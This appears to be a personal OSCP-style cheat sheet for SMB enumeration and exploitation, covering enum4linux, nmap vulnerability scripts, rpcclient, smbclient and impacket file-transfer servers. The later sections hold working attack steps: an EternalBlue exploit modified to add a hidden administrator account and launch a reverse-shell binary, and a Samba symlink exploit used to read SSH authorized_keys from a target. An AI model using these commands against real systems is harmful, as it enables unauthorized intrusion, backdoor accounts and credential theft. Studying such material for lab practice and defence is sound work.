SMB Server Enumeration
FIND SMB VERSION
…this can be done using wireshark
…or the techniques seen below
SMB1 – Windows 2000, XP and Windows 2003
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.
enum4linux -a ip
nbtscan ip
…keeping this for reference… used in a particular technique for SMB v2
sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'
# THEN GIVES OUTPUT... LOOK FOR VERSION NUMBERS
interface: tun0 (192.168.119.0/255.255.255.0)
filter: (ip || ip6)
match (JIT): s.?a.?m.?b.?a.*[[:digit:]]
T 192.168.119.299:36106 -> 10.11.10.299:139 [AP] #10
.....SMBr.....C.........................MICROSOFT NETWORKS 3.0..LANMAN1.0..LM1.2X002..DOS LANMAN2.1..LANMAN2.1..Samba..NT LANMAN 1.0..NT LM 0.12..SMB 2.002..SMB 2.???.
ENUM4LINUX
enum4linux -a ip
nbtscan ip
…keeping this for reference… used in a particular technique for SMB v2
sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'
# THEN GIVES OUTPUT... LOOK FOR VERSION NUMBERS
interface: tun0 (192.168.119.0/255.255.255.0)
filter: (ip || ip6)
match (JIT): s.?a.?m.?b.?a.*[[:digit:]]
T 192.168.119.299:36106 -> 10.11.10.299:139 [AP] #10
.....SMBr.....C.........................MICROSOFT NETWORKS 3.0..LANMAN1.0..LM1.2X002..DOS LANMAN2.1..LANMAN2.1..Samba..NT LANMAN 1.0..NT LM 0.12..SMB 2.002..SMB 2.???.
SCAN FOR VULNERABILITIES
…this uses the NMAP Scan Engine (NSE)
nmap --script smb-vuln* -p 139,445 ip
# MAY ALSO INSPECT THROUGH WIRESHARK
# SMB v2 ISN'T ALWAYS DETECTABLE
# EXAMPLE EXPLOIT AFTER FINDING v2.2 IN WIRESHARK
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c
# MAY FIND SOME USERS
nmap -sT -Pn --script smb-enum-users -p139,445 10.10.1.229
LIST SERVER SHARES
…sometimes there’s anonymous information
…other times require authentication
smbmap -H ip/hostname
# MULTIPLE COMMANDS
rpcclient -U "" -N ip
srvinfo # OS
netshareenumall # SHARES
enumdomusers # USERS
getdompwinfo # POLICIES
# ALSO MULTIPLE COMMANDS (type help)
smbclient \\[ip]\share-name
smbclient -L ip
# CONNECT - SMBv1 ERROR, REMOVE -L
smbclient \\ip\folder -U user
# MOUNT THE DRIVE
mount -t cifs -o username=user //ip/folder /mnt/smb/
# COPY FILES (CAUTION - NETWORK SPEED)
cp -r /mnt/smb/* ./local/folder
…or just try to list the shares
smbmap -H ip/hostname
echo exit | smbclient -L \\ip
nmap --script smb-enum-shares -p 139,445 ip
CREATE AN SMB SERVER
…do this on Kali to transfer files
…host the impacket server outside of shared folder
mkdir smbserver
impacket-smbserver share servingfolder
…or use a built in server to host your files
…this can be useful when Windows gives errors
sudo systemctl smb start
CONNECT TO YOUR SERVER
…sometimes you don’t need any authentications
…at other times, you may want it
copy \ipshare c:tmp
…with authentication, add the “net use” command
…you may want to create a user other than kali
net use \ipshare /user:kali password
BREKDOWN OF HOW TO CREATE THE SMB SERVER
impacket-smbserver <folder> <sharename>
impacket-smbserver -smb2support <folder> <sharename>
# CAN ALSO USE SMBD - NEEDS CONFIGURATION FOR PUBLIC FOLDER
# CREATE ON KALI
adduser user
sudo smbpasswd -a user
# ADD TO /etc/samba/smb.conf
[catch]
path = /home/kali/OSCP/TOOLS/uploads/catch
browseable = yes
read only = no
writable = yes
guest ok = yes
public = yes
create mask = 0644
directory mask = 0755
force user = achilles
# START SERVICE
sudo service smbd start
ETERNAL BLUE
… a common exploit used with earlier versions of Windows SMB
… searchsploit has a great exploit of 42315.py (see below)
(read the exploit… must download mysmb.py)
… also, see this for great scripts regarding Eternal Blue
# SMB (MS-010 - ETERNAL BLUE)
# SEARCHSPLOIT 42315.py
# INSERTED INTO THE EXPLOIT AROUND LINE 900
# ADDS A USER, THEN REMOTE IN TO GRAB THE BINARY
# THEN RUN EXPLOIT AGAIN TO TRIGGER BINARY
service_exec(conn, r'cmd /c net user blue pass /add')
service_exec(conn, r'cmd /c net localgroup administrators blue /add')
# THEN CHANGED THE COMMANDS TO RUN THE REVERSE SHELL
service_exec(conn, r'cmd /c c:tmpreverse_80.exe')
SMB SIM-LINK VULNERABILITY
… was a very difficult hack to find!
…this is the CVE to reference
# USER SHARE WAS FOUND ON THE SERVER
# THIS CREATES A SYM-LINK TO USE
./exploit 10.11.1.136 "User Share" link '../../../../../../../../../../'
# THEN GRAB THE INFORMATION
smbget smb://10.11.1.136/"User Share"/link/var/backups/ssh/authorized_keys